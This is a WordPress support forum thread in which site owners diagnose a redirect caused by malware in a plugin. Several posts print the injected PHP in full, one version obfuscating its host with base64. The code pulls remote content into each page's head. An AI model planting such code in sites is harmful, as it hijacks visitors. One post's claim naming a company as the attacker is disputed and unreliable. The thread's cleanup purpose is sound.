Hi I just got that exact, exact, exact problem and the same bieber video. How did u fix it, where exactly is the file containing that?
The redirect code is in the wp-content/cache folder. I had to manuallly delete the cache via FTP. I’m a little worried about w3 Total Caches security. How did the code get added to the cache folder and is it going to happen again?
Hey I am having the same problem and it is redirecting to a Justine beiber Video..My readers are complaining..Shall i remove the plugin?
@sahithhazari: If you require assistance then, as per the Forum Welcome, please post your own topic instead of tagging onto someone else’s topic.
We had this problem and it had nothing to do with the w3 cache.
This is the code you are looking for
[code] if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} [/code]
Download all of your site files via FTP, then download a program called ‘FileSeek’ (its free).
Set it to scan your site files for the term ‘http://spamcheckr.com/l.php’
You will find the infected files and remove the instance of ‘http://spamcheckr.com/l.php’ and the surrounding malicious code.
I hope this helps someone. Good luck.
Thanks Gekkoshot. I found te code and removed it. It was in a plugin I had installed
No problem, glad to help 🙂
Having the exact same problem, Notepad++ didn’t find the code, but fileseek did. Thanks a lot for your help !!
BUT …
How could we be sure that we won’t have the same problem after deletion ?
Secure your sites with some good WP security plugins.
For example –
Better WP Security
Sucuri Security – SiteCheck Malware Scanner
You could also update you main admin and FTP passwords as an extra precaution
Also over the next few days, regularly check your site files by FTP, you will notice the times and dates that certain files have been altered, if you didn’t update them, investigate further..
Also, only use plugins etc from trusted sources, we used a plugin forwarded to us from a third party and that’s how we got infected.
Thanks a lot for these advices.
I checked further, and i had the same infection type as you : a plugin forwarded by a friend … will have to be more careful.
Again, you rock !
To FIX it Check Gekkoshot article
This is the code you are looking for
[code] if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} [/code]
Download all of your site files via FTP, then download a program called ‘FileSeek’ (its free).
Set it to scan your site files for the term ‘http://spamcheckr.com/l.php’
You will find the infected files and remove the instance of ‘http://spamcheckr.com/l.php’ and the surrounding malicious code.
http://wordpress.org/support/topic/my-website-is-redirecting-to-a-youtube-video?replies=11
Thank You For your help !
And i have made a trace to see from whom is coming all this issue and got him , if someone need to contact him here id the info :
http://www.bnbclone.com/ owns http://spamcheckr.com/ (virus code)
BnbClone.com | Nemo Limited
Suite 102, Ground Floor
Corner of Eyre & Hutson Streets, Belize City, Belize
Registrant Phone: +507.65967959
@hmx Radio
Your claim that http://www.bnbclone.com | Nemo Limited owns http://spamcheckr.com/ (virus code) is completely NOT TRUE – where did you get this info?
http://www.bnbclone.com/ is a vacation rental / peer to peer software company and their products and services are clearly explained on their website and have NO CONNECTION to http://spamcheckr.com/
Suggest you reframe from posting incorrect information which cannot be backed up!
If you can’t find http://spamcheckr.com/l.php look for the code below.
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_chesk() {if(function_exists('curl_init')) {$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_chesk');}}?>
Thankyou so much Its work